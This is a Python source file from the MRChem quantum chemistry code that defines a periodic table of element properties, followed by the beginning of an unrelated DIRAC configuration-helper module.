# # MRChem, a numerical real-space code for molecular electronic structure # calculations within the self-consistent field (SCF) approximations of quantum # chemistry (Hartree-Fock and Density Functional Theory). # Copyright (C) 2021 Stig Rune Jensen, Luca Frediani, Peter Wind and contributors. # # This file is part of MRChem. # # MRChem is free software: you can redistribute it and/or modify # it under the terms of the GNU Lesser General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # MRChem is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public License # along with MRChem. If not, see <https://www.gnu.org/licenses/>. # # For information on the complete list of contributors to MRChem, see: # <https://mrchem.readthedocs.io/> # from collections import OrderedDict, namedtuple class Element( namedtuple( "Element", "radius covalent Z mass symbol bpt mpt density volume name debye a crystal cpera conf", ) ): __slots__ = () def __new__(cls, iterable): return super(cls, Element).__new__( cls, radius=float(iterable[0]), covalent=float(iterable[1]), Z=int(iterable[2]), mass=float(iterable[3]), symbol=iterable[4], bpt=float(iterable[5]), mpt=float(iterable[6]), density=float(iterable[7]), volume=float(iterable[8]), name=iterable[9], debye=float(iterable[10]), a=float(iterable[11]), crystal=iterable[12], cpera=float(iterable[13]), conf=iterable[14], ) def __str__(self): return "{:s} ({:s}): {{{:s}}}, Z={:d}, m={:f}".format( self.name, self.symbol, self.conf, self.Z, self.mass ) PeriodicTable = OrderedDict({ 'h': Element([ '0.79', '0.32', '1', '1.00794', 'H', '20.268', '14.025', '0.0899', '14.4', 'Hydrogen', '110.0', '3.75', 'HEX', '1.731', '1s1' ]), 'he': Element([ '0.49', '0.93', '2', '4.002602', 'He', '4.215', '0.95', '0.1787', '0.0', 'Helium', '-26.0', '3.57', 'HEX', '1.633', '1s2' ]), 'li': Element([ '2.05', '1.23', '3', '6.941', 'Li', '1615', '453.7', '0.53', '13.10', 'Lithium', '400.0', '3.49', 'BCC', '0.00', '1s2_2s1' ]), 'be': Element([ '1.40', '0.90', '4', '9.012182', 'Be', '2745', '1560.0', '1.85', '5.0', 'Beryllium', '1000.0', '2.29', 'HEX', '1.567', '1s2_2s2' ]), 'b': Element([ '1.17', '0.82', '5', '10.811', 'B', '4275', '2300.0', '2.34', '4.6', 'Boron', '1250.0', '8.73', 'TET', '0.576', '1s2_2s2_2p1' ]), 'c': Element([ '0.91', '0.77', '6', '12.011', 'C', '4470.0', '4100.0', '2.62', '4.58', 'Carbon', '1860.0', '3.57', 'DIA', '0.00', '1s2_2s2_2p2' ]), 'n': Element([ '0.75', '0.75', '7', '14.00674', 'N', '77.35', '63.14', '1.251', '17.3', 'Nitrogen', '-79.0', '4.039', 'HEX', '1.651', '1s2_2s2_2p3' ]), 'o': Element([ '0.65', '0.73', '8', '15.9994', 'O', '90.18', '50.35', '1.429', '14.0', 'Oxygen', '-46.0', '6.83', 'CUB', '0.00', '1s2_2s2_2p4' ]), 'f': Element([ '0.57', '0.72', '9', '18.9984032', 'F', '84.95', '53.48', '1.696', '17.1', 'Fluorine', '0.0', '0.00', 'MCL', '0.00', '1s2_2s2_2p5' ]), 'ne': Element([ '0.51', '0.71', '10', '20.1797', 'Ne', '27.096', '24.553', '0.901', '16.7', 'Neon', '63.0', '4.43', 'FCC', '0.00', '1s2_2s2_2p6' ]), 'na': Element([ '2.23', '1.54', '11', '22.989768', 'Na', '1156', '371.0', '0.97', '23.7', 'Sodium', '150.0', '4.23', 'BCC', '0.00', '[Ne]3s1' ]), 'mg': Element([ '1.72', '1.36', '12', '24.3050', 'Mg', '1363', '922', '1.74', '13.97', 'Magnesium', '318.0', '3.21', 'HEX', '1.624', '[Ne]3s2' ]), 'al': Element([ '1.82', '1.18', '13', '26.981539', 'Al', '2793', '933.25', '2.70', '10.0', 'Aluminum', '394.0', '4.05', 'FCC', '0.00', '[Ne]3s2_3p1' ]), 'si': Element([ '1.46', '1.11', '14', '28.0855', 'Si', '3540.0', '1685', '2.33', '12.1', 'Silicon', '625.0', '5.43', 'DIA', '0.00', '[Ne]3s2_3p2' ]), 'p': Element([ '1.23', '1.06', '15', '30.97362', 'P', '550.0', '317.30', '1.82', '17.0', 'Phosphorus', '0.0', '7.17', 'CUB', '0.00', '[Ne]3s2_3p3' ]), 's': Element([ '1.09', '1.02', '16', '32.066', 'S', '717.75', '388.36', '2.07', '15.5', 'Sulfur', '0.0', '10.47', 'ORC', '0.00', '[Ne]3s2_3p4' ]), 'cl': Element([ '0.97', '0.99', '17', '35.4527', 'Cl', '239.1', '172.16', '3.17', '22.7', 'Chlorine', '0.0', '6.24', 'ORC', '0.00', '[Ne]3s2_3p5' ]), 'ar': Element([ '0.88', '0.98', '18', '39.948', 'Ar', '87.30', '83.81', '1.784', '28.5', 'Argon', '85.0', '5.26', 'FCC', '0.00', '[Ne]3s2_3p6' ]), 'k': Element([ '2.77', '2.03', '19', '39.0983', 'K', '1032', '336.35', '0.86', '45.46', 'Potassium', '100.0', '5.23', 'BCC', '0.00', '[Ar]4s1' ]), 'ca': Element([ '2.23', '1.91', '20', '40.078', 'Ca', '1757', '1112', '1.55', '29.9', 'Calcium', '230.0', '5.58', 'FCC', '0.00', '[Ar]4s2' ]), 'sc': Element([ '2.09', '1.62', '21', '44.955910', 'Sc', '3104', '1812', '3.0', '15.0', 'Scandium', '-359.0', '3.31', 'HEX', '1.594', '[Ar]3d1_4s2' ]), 'ti': Element([ '2.00', '1.45', '22', '47.88', 'Ti', '3562', '1943', '4.50', '10.64', 'Titanium', '380.0', '2.95', 'HEX', '1.588', '[Ar]3d2_4s2' ]), 'v': Element([ '1.92', '1.34', '23', '50.9415', 'V', '3682', '2175', '5.8', '8.78', 'Vanadium', '390.0', '3.02', 'BCC', '0.00', '[Ar]3d3_4s2' ]), 'cr': Element([ '1.85', '1.18', '24', '51.9961', 'Cr', '2945', '2130.0', '7.19', '7.23', 'Chromium', '460.0', '2.88', 'BCC', '0.00', '[Ar]3d5_4s1' ]), 'mn': Element([ '1.79', '1.17', '25', '54.93085', 'Mn', '2335', '1517', '7.43', '1.39', 'Manganese', '400.0', '8.89', 'CUB', '0.00', '[Ar]3d5_4s2' ]), 'fe': Element([ '1.72', '1.17', '26', '55.847', 'Fe', '3135', '1809', '7.86', '7.1', 'Iron', '460.0', '2.87', 'BCC', '0.00', '[Ar]3d6_4s2' ]), 'co': Element([ '1.67', '1.16', '27', '58.93320', 'Co', '3201', '1768', '8.90', '6.7', 'Cobalt', '385.0', '2.51', 'HEX', '0.00', '[Ar]3d7_4s2' ]), 'ni': Element([ '1.62', '1.15', '28', '58.69', 'Ni', '3187', '1726', '8.90', '6.59', 'Nickel', '375.0', '3.52', 'FCC', '0.00', '[Ar]3d8_4s2' ]), 'cu': Element([ '1.57', '1.17', '29', '63.546', 'Cu', '2836', '1357.6', '8.96', '7.1', 'Copper', '315.0', '3.61', 'FCC', '0.00', '[Ar]3d10_4s1' ]), 'zn': Element([ '1.53', '1.25', '30', '65.39', 'Zn', '1180.0', '692.73', '7.14', '9.2', 'Zinc', '234.0', '2.66', 'HEX', '0.00', '[Ar]3d10_4s2' ]), 'ga': Element([ '1.81', '1.26', '31', '69.723', 'Ga', '2478', '302.90', '5.91', '11.8', 'Gallium', '240.0', '4.51', 'ORC', '0.00', '[Ar]3d10_4s2_4p1' ]), 'ge': Element([ '1.52', '1.22', '32', '72.61', 'Ge', '3107', '1210.4', '5.32', '13.6', 'Germanium', '360.0', '5.66', 'DIA', '0.00', '[Ar]3d10_4s2_4p2' ]), 'as': Element([ '1.33', '1.20', '33', '74.92159', 'As', '876', '1081', '5.72', '13.1', 'Arsenic', '285.0', '4.13', 'RHL', '54.16', '[Ar]3d10_4s2_4p3' ]), 'se': Element([ '1.22', '1.16', '34', '78.96', 'Se', '958', '494', '4.80', '16.45', 'Selenium', '-150.0', '4.36', 'HEX', '0.00', '[Ar]3d10_4s2_4p4' ]), 'br': Element([ '1.12', '1.14', '35', '79.904', 'Br', '332.25', '265.90', '3.12', '23.5', 'Bromine', '0.0', '6.67', 'ORC', '0.00', '[Ar]3d10_4s2_4p5' ]), 'kr': Element([ '1.03', '1.12', '36', '83.80', 'Kr', '119.80', '115.78', '3.74', '38.9', 'Krypton', '-73.0', '5.72', 'FCC', '0.00', '[Ar]3d10_4s2_4p6' ]), 'rb': Element([ '2.98', '2.16', '37', '85.4678', 'Rb', '961', '312.64', '1.53', '55.9', 'Rubidium', '-56.0', '5.59', 'BCC', '0.00', '[Kr]5s1' ]), 'sr': Element([ '2.45', '1.91', '38', '87.62', 'Sr', '1650.0', '1041', '2.6', '33.7', 'Strontium', '-147.0', '6.08', 'FCC', '0.00', '[Kr]5s2' ]), 'y': Element([ '2.27', '1.62', '39', '88.90585', 'Y', '3611', '1799', '4.5', '19.8', 'Yttrium', '-256.0', '3.65', 'HEX', '1.571', '[Kr]4d1_5s2' ]), 'zr': Element([ '2.16', '1.45', '40', '91.224', 'Zr', '4682', '2125', '6.49', '14.1', 'Zirconium', '250.0', '3.23', 'HEX', '1.593', '[Kr]4d2_5s2' ]), 'nb': Element([ '2.09', '1.34', '41', '92.90638', 'Nb', '5017', '2740.0', '8.55', '10.87', 'Niobium', '275.0', '3.30', 'BCC', '0.00', '[Kr]4d4_5s1' ]), 'mo': Element([ '2.01', '1.30', '42', '95.94', 'Mo', '4912', '2890.0', '10.2', '9.4', 'Molybdenum', '380.0', '3.15', 'BCC', '0.00', '[Kr]4d5_5s1' ]), 'tc': Element([ '1.95', '1.27', '43', '-98', 'Tc', '4538', '2473', '11.5', '8.5', 'Technetium', '0.0', '2.74', 'HEX', '1.604', '[Kr]4d5_5s2' ]), 'ru': Element([ '1.89', '1.25', '44', '101.07', 'Ru', '4423', '2523', '12.2', '8.3', 'Ruthenium', '-382.0', '2.70', 'HEX', '1.584', '[Kr]4d7_5s1' ]), 'rh': Element([ '1.83', '1.25', '45', '102.90550', 'Rh', '3970.0', '2236', '12.4', '8.3', 'Rhodium', '-350.0', '3.80', 'FCC', '0.00', '[Kr]4d8_5s1' ]), 'pd': Element([ '1.79', '1.28', '46', '106.42', 'Pd', '3237', '1825', '12.0', '8.9', 'Palladium', '275.0', '3.89', 'FCC', '0.00', '[Kr]4d10_5s0' ]), 'ag': Element([ '1.75', '1.34', '47', '107.8682', 'Ag', '2436', '1234', '10.5', '10.3', 'Silver', '215.0', '4.09', 'FCC', '0.00', '[Kr]4d10_5s1' ]), 'cd': Element([ '1.71', '1.48', '48', '112.411', 'Cd', '1040.0', '594.18', '8.65', '13.1', 'Cadmium', '120.0', '2.98', 'HEX', '1.886', '[Kr]4d10_5s2' ]), 'in': Element([ '2.00', '1.44', '49', '114.82', 'In', '2346', '429.76', '7.31', '15.7', 'Indium', '129.0', '4.59', 'TET', '1.076', '[Kr]4d10_5s2_5p1' ]), 'sn': Element([ '1.72', '1.41', '50', '118.710', 'Sn', '2876', '505.06', '7.30', '16.3', 'Tin', '170.0', '5.82', 'TET', '0.546', '[Kr]4d10_5s2_5p2' ]), 'sb': Element([ '1.53', '1.40', '51', '121.75', 'Sb', '1860.0', '904', '6.68', '18.23', 'Antimony', '200.0', '4.51', 'RHL', '57.10', '[Kr]4d10_5s2_5p3' ]), 'te': Element([ '1.42', '1.36', '52', '127.60', 'Te', '1261', '722.65', '6.24', '20.5', 'Tellurium', '-139.0', '4.45', 'HEX', '1.33', '[Kr]4d10_5s2_5p4' ]), 'i': Element([ '1.32', '1.33', '53', '126.90447', 'I', '458.4', '386.7', '4.92', '25.74', 'Iodine', '0.0', '7.27', 'ORC', '0.00', '[Kr]4d10_5s2_5p5' ]), 'xe': Element([ '1.24', '1.31', '54', '131.29', 'Xe', '165.03', '161.36', '5.89', '37.3', 'Xenon', '-55.0', '6.20', 'FCC', '0.00', '[Kr]4d10_5s2_5p6' ]), 'cs': Element([ '3.34', '2.35', '55', '132.90543', 'Cs', '944', '301.55', '1.87', '71.07', 'Cesium', '-40.0', '6.05', 'BCC', '0.00', '[Xe]6s1' ]), 'ba': Element([ '2.78', '1.98', '56', '137.327', 'Ba', '2171', '1002', '3.5', '39.24', 'Barium', '-110.0', '5.02', 'BCC', '0.00', '[Xe]6s2' ]), 'la': Element([ '2.74', '1.69', '57', '138.9055', 'La', '3730.0', '1193', '6.7', '20.73', 'Lanthanum', '132.0', '3.75', 'HEX', '1.619', '[Xe]5d1_6s2' ]), 'hf': Element([ '2.16', '1.44', '72', '178.49', 'Hf', '4876', '2500.0', '13.1', '13.6', 'Hafnium', '0.0', '3.20', 'HEX', '1.582', '[Xe]4f14_5d2_6s2' ]), 'ta': Element([ '2.09', '1.34', '73', '180.9479', 'Ta', '5731', '3287', '16.6', '10.90', 'Tantalum', '225.0', '3.31', 'BCC', '0.00', '[Xe]4f14_5d3_6s2' ]), 'w': Element([ '2.02', '1.30', '74', '183.85', 'W', '5828', '3680.0', '19.3', '9.53', 'Tungsten', '310.0', '3.16', 'BCC', '0.00', '[Xe]4f14_5d4_6s2' ]), 're': Element([ '1.97', '1.28', '75', '186.207', 'Re', '5869', '3453', '21.0', '8.85', 'Rhenium', '416.0', '2.76', 'HEX', '1.615', '[Xe]4f14_5d5_6s2' ]), 'os': Element([ '1.92', '1.26', '76', '190.2', 'Os', '5285', '3300.0', '22.4', '8.49', 'Osmium', '-400.0', '2.74', 'HEX', '1.579', '[Xe]4f14_5d6_6s2' ]), 'ir': Element([ '1.87', '1.27', '77', '192.22', 'Ir', '4701', '2716', '22.5', '8.54', 'Iridium', '430.0', '3.84', 'FCC', '0.00', '[Xe]4f14_5d7_6s2' ]), 'pt': Element([ '1.83', '1.30', '78', '195.08', 'Pt', '4100.0', '2045', '21.4', '9.10', 'Platinum', '230.0', '3.92', 'FCC', '0.00', '[Xe]4f14_5d10_6s0' ]), 'au': Element([ '1.79', '1.34', '79', '196.96654', 'Au', '3130.0', '1337.58', '19.3', '10.2', 'Gold', '170.0', '4.08', 'FCC', '0.00', '[Xe]4f14_5d10_6s1' ]), 'hg': Element([ '1.76', '1.49', '80', '200.59', 'Hg', '630.0', '234.28', '13.53', '14.82', 'Mercury', '100.0', '2.99', 'RHL', '70.75', '[Xe]4f14_5d10_6s2' ]), 'tl': Element([ '2.08', '1.48', '81', '204.3833', 'Tl', '1746', '577', '11.85', '17.2', 'Thallium', '96.0', '3.46', 'HEX', '1.599', '[Xe]4f14_5d10_6s2_6p1' ]), 'pb': Element([ '1.81', '1.47', '82', '207.2', 'Pb', '2023', '600.6', '11.4', '18.17', 'Lead', '88.0', '4.95', 'FCC', '0.00', '[Xe]4f14_5d10_6s2_6p2' ]), 'bi': Element([ '1.63', '1.46', '83', '208.98037', 'Bi', '1837', '544.52', '9.8', '21.3', 'Bismuth', '120.0', '4.75', 'RHL', '57.23', '[Xe]4f14_5d10_6s2_6p3' ]), 'po': Element([ '1.53', '1.46', '84', '-209', 'Po', '1235', '527', '9.4', '22.23', 'Polonium', '0.0', '3.35', 'SC', '0.00', '[Xe]4f14_5d10_6s2_6p4' ]), 'at': Element([ '1.43', '1.45', '85', '210.0', 'At', '610.0', '575', '0.0', '0.0', 'Astatine', '0.0', '0.00', '', '0.00', '[Xe]4f14_5d10_6s2_6p5' ]), 'rn': Element([ '1.34', '1.43', '86', '-222', 'Rn', '211', '202', '9.91', '50.5', 'Radon', '0.0', '0.00', 'FCC', '0.00', '[Xe]4f14_5d10_6s2_6p6' ]), 'fr': Element([ '3.50', '2.50', '87', '-223', 'Fr', '950.0', '300.0', '0.0', '0.0', 'Francium', '0.0', '0.00', 'BCC', '0.00', '[Rn]7s1' ]), 'ra': Element([ '3.00', '2.40', '88', '226.025', 'Ra', '1809', '973', '5', '45.20', 'Radium', '0.0', '0.00', '', '0.00', '[Rn]7s2' ]), 'ac': Element([ '3.20', '2.20', '89', '227.028', 'Ac', '3473', '1323', '10.07', '22.54', 'Actinium', '0.0', '5.31', 'FCC', '0.00', '[Rn]6d1_7s2' ]), 'rf': Element([ '0.0', '0.0', '104', '-257.0', 'Rf', '0.0', '0.0', '0.0', '0.0', 'Rutherfordium', '0.0', '0.00', '', '0.00', '4-5s' ]), 'ha': Element([ '0.0', '0.0', '105', '-262.0', 'Ha', '0.0', '0.0', '0.0', '0.0', 'Hahnium', '0.0', '0.00', '', '0.00', '40s' ]), 'sq': Element([ '0.0', '0.0', '106', '-263.0', 'Sq', '0.0', '0.0', '0.0', '0.0', 'Seaborgium', '0.0', '0.00', '', '0.00', '0.9s' ]), 'ns': Element([ '0.0', '0.0', '107', '-262.0', 'Ns', '0.0', '0.0', '0.0', '0.0', 'Nielsbohrium', '0.0', '0.00', '', '0.00', '2ms' ]), 'hs': Element([ '0.0', '0.0', '108', '-264.0', 'Hs', '0.0', '0.0', '0.0', '0.0', 'Hassium', '0.0', '0.00', '', '0.00', '' ]), 'mt': Element([ '0.0', '0.0', '109', '-266', 'Mt', '0.0', '0.0', '0.0', '0.0', 'Meitnerium', '0.0', '0.00', '', '0.00', '5ms' ]), '110': Element([ '0.0', '0.0', '110', '-269', '110', '0.0', '0.0', '0.0', '0.0', '(recent_disc.)', '0.0', '0.00', '', '0.00', '' ]), '111': Element([ '0.0', '0.0', '111', '-272', '111', '0.0', '0.0', '0.0', '0.0', '(recent_disc.)', '0.0', '0.00', '', '0.00', '4/1000s' ]), '112': Element([ '0.0', '0.0', '112', '-277', '112', '0.0', '0.0', '0.0', '0.0', '(recent_disc.)', '0.0', '0.00', '', '0.00', '280\265s' ]), 'ce': Element([ '2.70', '1.65', '58', '140.115', 'Ce', '3699', '1071', '6.78', '20.67', 'Cerium', '-139.0', '5.16', 'FCC', '0.00', '[Xe]4f2_5d0_6s2' ]), 'pr': Element([ '2.67', '1.65', '59', '140.90765', 'Pr', '3785', '1204', '6.77', '20.8', 'Praseodymium', '-152.0', '3.67', 'HEX', '1.614', '[Xe]4f3_5d0_6s2' ]), 'nd': Element([ '2.64', '1.64', '60', '144.24', 'Nd', '3341', '1289', '7.00', '20.6', 'Neodymium', '-157.0', '3.66', 'HEX', '1.614', '[Xe]4f4_5d0_6s2' ]), 'pm': Element([ '2.62', '1.63', '61', '-145', 'Pm', '3785', '1204', '6.475', '22.39', 'Promethium', '0.0', '0.00', '', '0.00', '[Xe]4f5_5d0_6s2' ]), 'sm': Element([ '2.59', '1.62', '62', '150.36', 'Sm', '2064', '1345', '7.54', '19.95', 'Samarium', '166.0', '9.00', 'RHL', '23.22', '[Xe]4f6_5d0_6s2' ]), 'eu': Element([ '2.56', '1.85', '63', '151.965', 'Eu', '1870.0', '1090.0', '5.26', '28.9', 'Europium', '-107.0', '4.61', 'BCC', '0.00', '[Xe]4f7_5d0_6s2' ]), 'gd': Element([ '2.54', '1.61', '64', '157.25', 'Gd', '3539', '1585', '7.89', '19.9', 'Gadolinium', '-176.0', '3.64', 'HEX', '1.588', '[Xe]4f7_5d1_6s2' ]), 'tb': Element([ '2.51', '1.59', '65', '158.92534', 'Tb', '3496', '1630.0', '8.27', '19.2', 'Terbium', '-188.0', '3.60', 'HEX', '1.581', '[Xe]4f9_5d0_6s2' ]), 'dy': Element([ '2.49', '1.59', '66', '162.50', 'Dy', '2835', '1682', '8.54', '19.0', 'Dysprosium', '-186.0', '3.59', 'HEX', '1.573', '[Xe]4f10_5d0_6s2' ]), 'ho': Element([ '2.47', '1.58', '67', '164.93032', 'Ho', '2968', '1743', '8.80', '18.7', 'Holmium', '-191.0', '3.58', 'HEX', '1.570', '[Xe]4f11_5d0_6s2' ]), 'er': Element([ '2.45', '1.57', '68', '167.26', 'Er', '3136', '1795', '9.05', '18.4', 'Erbium', '-195.0', '3.56', 'HEX', '1.570', '[Xe]4f12_5d0_6s2' ]), 'tm': Element([ '2.42', '1.56', '69', '168.93421', 'Tm', '2220.0', '1818', '9.33', '18.1', 'Thulium', '-200.0', '3.54', 'HEX', '1.570', '[Xe]4f13_5d0_6s2' ]), 'yb': Element([ '2.40', '1.74', '70', '173.04', 'Yb', '1467', '1097', '6.98', '24.79', 'Ytterbium', '-118.0', '5.49', 'FCC', '0.00', '[Xe]4f14_5d0_6s2' ]), 'lu': Element([ '2.25', '1.56', '71', '174.967', 'Lu', '3668', '1936', '9.84', '17.78', 'Lutetium', '-207.0', '3.51', 'HEX', '1.585', '[Xe]4f14_5d1_6s2' ]), 'th': Element([ '3.16', '1.65', '90', '232.0381', 'Th', '5061', '2028', '11.7', '19.9', 'Thorium', '100.0', '5.08', 'FCC', '0.00', '[Rn]6d2_7s2' ]), 'pa': Element([ '3.14', '0.0', '91', '231.03588', 'Pa', '0.0', '0.0', '15.4', '15.0', 'Protactinium', '0.0', '3.92', 'TET', '0.825', '[Rn]5f2_6d1_7s2' ]), 'u': Element([ '3.11', '1.42', '92', '238.0289', 'U', '4407', '1405', '18.90', '12.59', 'Uranium', '-210.0', '2.85', 'ORC', '0.00', '[Rn]5f3_6d1_7s2' ]), 'np': Element([ '3.08', '0.0', '93', '237.048', 'Np', '0.0', '910.0', '20.4', '11.62', 'Neptunium', '-188.0', '4.72', 'ORC', '0.00', '[Rn]5f4_6d1_7s2' ]), 'pu': Element([ '3.05', '0.0', '94', '-244', 'Pu', '3503', '913', '19.8', '12.32', 'Plutonium', '-150.0', '0.00', 'MCL', '0.00', '[Rn]5f6_6d0_7s2' ]), 'am': Element([ '3.02', '0.0', '95', '-243', 'Am', '2880.0', '1268', '13.6', '17.86', 'Americium', '0.0', '0.00', '', '0.00', '[Rn]5f7_6d0_7s2' ]), 'cm': Element([ '2.99', '0.0', '96', '-247', 'Cm', '0.0', '1340.0', '13.511', '18.28', 'Curium', '0.0', '0.00', '', '0.00', '[Rn]5f7_6d1_7s2' ]), 'bk': Element([ '2.97', '0.0', '97', '-247', 'Bk', '0.0', '0.0', '0.0', '0.0', 'Berkelium', '0.0', '0.00', '', '0.00', '[Rn]5f8_6d1_7s2' ]), 'cf': Element([ '2.95', '0.0', '98', '-251', 'Cf', '0.0', '900.0', '0.0', '0.0', 'Californium', '0.0', '0.00', '', '0.00', '[Rn]5f10_6d0_7s2' ]), 'es': Element([ '2.92', '0.0', '99', '-252', 'Es', '0.0', '0.0', '0.0', '0.0', 'Einsteinium', '0.0', '0.00', '', '0.00', '[Rn]5f11_6d0_7s2' ]), 'fm': Element([ '2.90', '0.0', '100', '-257', 'Fm', '0.0', '0.0', '0.0', '0.0', 'Fermium', '0.0', '0.00', '', '0.00', '[Rn]5f12_6d0_7s2' ]), 'md': Element([ '2.87', '0.0', '101', '-258', 'Md', '0.0', '0.0', '0.0', '0.0', 'Mendelevium', '0.0', '0.00', '', '0.00', '[Rn]5f13_6d0_7s2' ]), 'no': Element([ '2.85', '0.0', '102', '-259', 'No', '0.0', '0.0', '0.0', '0.0', 'Nobelium', '0.0', '0.00', '', '0.00', '[Rn]5f14_6d0_7s2' ]), 'lr': Element([ '2.82', '0.0', '103', '-260', 'Lr', '0.0', '0.0', '0.0', '0.0', 'Lawrencium', '0.0', '0.00', '', '0.00', '[Rn]5f14_6d1_7s2' ]), 'none': Element([ '0.0', '0.0', '0', '0', 'None', '0.0', '0.0', '0.0', '0.0', 'None', '0.0', '0.00', '', '0.00', '-' ]), 'x': Element([ '0.0', '0.0', '0', '0', 'X', '0.0', '0.0', '0.0', '0.0', 'X', '0.0', '0.00', '', '0.00', '-' ]), 'q': Element([ '0.0', '0.0', '0', '0', 'Q', '0.0', '0.0', '0.0', '0.0', 'Q', '0.0', '0.00', '', '0.00', '-' ]) }) PeriodicTableByName = PeriodicTable PeriodicTableByZ = OrderedDict( { 32: PeriodicTableByName["ge"], 64: PeriodicTableByName["gd"], 31: PeriodicTableByName["ga"], 57: PeriodicTableByName["la"], 3: PeriodicTableByName["li"], 81: PeriodicTableByName["tl"], 69: PeriodicTableByName["tm"], 103: PeriodicTableByName["lr"], 90: PeriodicTableByName["th"], 22: PeriodicTableByName["ti"], 52: PeriodicTableByName["te"], 65: PeriodicTableByName["tb"], 43: PeriodicTableByName["tc"], 73: PeriodicTableByName["ta"], 70: PeriodicTableByName["yb"], 0: PeriodicTableByName["none"], 66: PeriodicTableByName["dy"], 54: PeriodicTableByName["xe"], 1: PeriodicTableByName["h"], 15: PeriodicTableByName["p"], 0: PeriodicTableByName["x"], 30: PeriodicTableByName["zn"], 111: PeriodicTableByName["111"], 110: PeriodicTableByName["110"], 112: PeriodicTableByName["112"], 63: PeriodicTableByName["eu"], 40: PeriodicTableByName["zr"], 68: PeriodicTableByName["er"], 44: PeriodicTableByName["ru"], 75: PeriodicTableByName["re"], 104: PeriodicTableByName["rf"], 88: PeriodicTableByName["ra"], 37: PeriodicTableByName["rb"], 86: PeriodicTableByName["rn"], 45: PeriodicTableByName["rh"], 4: PeriodicTableByName["be"], 56: PeriodicTableByName["ba"], 83: PeriodicTableByName["bi"], 97: PeriodicTableByName["bk"], 35: PeriodicTableByName["br"], 6: PeriodicTableByName["c"], 19: PeriodicTableByName["k"], 8: PeriodicTableByName["o"], 16: PeriodicTableByName["s"], 74: PeriodicTableByName["w"], 76: PeriodicTableByName["os"], 27: PeriodicTableByName["co"], 96: PeriodicTableByName["cm"], 17: PeriodicTableByName["cl"], 20: PeriodicTableByName["ca"], 91: PeriodicTableByName["pa"], 98: PeriodicTableByName["cf"], 58: PeriodicTableByName["ce"], 48: PeriodicTableByName["cd"], 55: PeriodicTableByName["cs"], 24: PeriodicTableByName["cr"], 29: PeriodicTableByName["cu"], 59: PeriodicTableByName["pr"], 78: PeriodicTableByName["pt"], 94: PeriodicTableByName["pu"], 82: PeriodicTableByName["pb"], 71: PeriodicTableByName["lu"], 46: PeriodicTableByName["pd"], 84: PeriodicTableByName["po"], 61: PeriodicTableByName["pm"], 108: PeriodicTableByName["hs"], 67: PeriodicTableByName["ho"], 105: PeriodicTableByName["ha"], 72: PeriodicTableByName["hf"], 80: PeriodicTableByName["hg"], 2: PeriodicTableByName["he"], 101: PeriodicTableByName["md"], 12: PeriodicTableByName["mg"], 5: PeriodicTableByName["b"], 9: PeriodicTableByName["f"], 42: PeriodicTableByName["mo"], 25: PeriodicTableByName["mn"], 7: PeriodicTableByName["n"], 109: PeriodicTableByName["mt"], 23: PeriodicTableByName["v"], 89: PeriodicTableByName["ac"], 47: PeriodicTableByName["ag"], 77: PeriodicTableByName["ir"], 95: PeriodicTableByName["am"], 13: PeriodicTableByName["al"], 33: PeriodicTableByName["as"], 18: PeriodicTableByName["ar"], 79: PeriodicTableByName["au"], 85: PeriodicTableByName["at"], 49: PeriodicTableByName["in"], 28: PeriodicTableByName["ni"], 102: PeriodicTableByName["no"], 11: PeriodicTableByName["na"], 41: PeriodicTableByName["nb"], 60: PeriodicTableByName["nd"], 10: PeriodicTableByName["ne"], 99: PeriodicTableByName["es"], 93: PeriodicTableByName["np"], 107: PeriodicTableByName["ns"], 87: PeriodicTableByName["fr"], 21: PeriodicTableByName["sc"], 26: PeriodicTableByName["fe"], 100: PeriodicTableByName["fm"], 53: PeriodicTableByName["i"], 38: PeriodicTableByName["sr"], 106: PeriodicTableByName["sq"], 0: PeriodicTableByName["q"], 36: PeriodicTableByName["kr"], 14: PeriodicTableByName["si"], 92: PeriodicTableByName["u"], 50: PeriodicTableByName["sn"], 62: PeriodicTableByName["sm"], 39: PeriodicTableByName["y"], 51: PeriodicTableByName["sb"], 34: PeriodicTableByName["se"], } ) def main(): print("PeriodicTableByZ = {") for k, v in PeriodicTableByName.items(): print("{:d} : PeriodicTableByName['{:s}'],".format(v.Z, k)) print("}") if __name__ == "__main__": main()
MRChemSoft/mrchem
python/mrchem/periodictable.py
Python
lgpl-3.0
27,216
[ "CRYSTAL" ]
a90a3a0d7624c196f0e9707499cdf3bdde2ed030346ba6f5723f38f5aafceed9
######################################################################## # File : ResourcesDefaults.py # Author : Ricardo Graciani ######################################################################## """ Some Helper class to access Default options for Different Resources (CEs, SEs, Catalags,...) """ from __future__ import print_function from __future__ import absolute_import from __future__ import division from diraccfg import CFG from DIRAC.ConfigurationSystem.Client.Helpers.Path import cfgResourceSection, cfgPath, cfgInstallPath, cfgPathToList __RCSID__ = "$Id$" def defaultSection(resource): """ Build the path for the Defaults section """ return cfgPath(cfgResourceSection, 'Defaults', resource) def getComputingElementDefaults(ceName='', ceType='', cfg=None, currentSectionPath=''): """ Return cfgDefaults with defaults for the given CEs defined either in arguments or in the provided cfg """ cesCfg = CFG() if cfg: try: cesCfg.loadFromFile(cfg) cesPath = cfgInstallPath('ComputingElements') if cesCfg.isSection(cesPath): for section in cfgPathToList(cesPath): cesCfg = cesCfg[section] except Exception: return CFG() # Overwrite the cfg with Command line arguments if ceName: if not cesCfg.isSection(ceName): cesCfg.createNewSection(ceName) if currentSectionPath: # Add Options from Command Line optionsDict = __getExtraOptions(currentSectionPath) for name, value in optionsDict.items(): cesCfg[ceName].setOption(name, value) # pylint: disable=no-member if ceType: cesCfg[ceName].setOption('CEType', ceType) # pylint: disable=no-member ceDefaultSection = cfgPath(defaultSection('ComputingElements')) # Load Default for the given type from Central configuration is defined ceDefaults = __gConfigDefaults(ceDefaultSection) for ceName in cesCfg.listSections(): if 'CEType' in cesCfg[ceName]: ceType = cesCfg[ceName]['CEType'] if ceType in ceDefaults: for option in ceDefaults[ceType].listOptions(): # pylint: disable=no-member if option not in cesCfg[ceName]: cesCfg[ceName].setOption(option, ceDefaults[ceType][option]) # pylint: disable=unsubscriptable-object return cesCfg def __gConfigDefaults(defaultPath): """ Build a cfg from a Default Section """ from DIRAC import gConfig cfgDefaults = CFG() result = gConfig.getSections(defaultPath) if not result['OK']: return cfgDefaults for name in result['Value']: typePath = cfgPath(defaultPath, name) cfgDefaults.createNewSection(name) result = gConfig.getOptionsDict(typePath) if result['OK']: 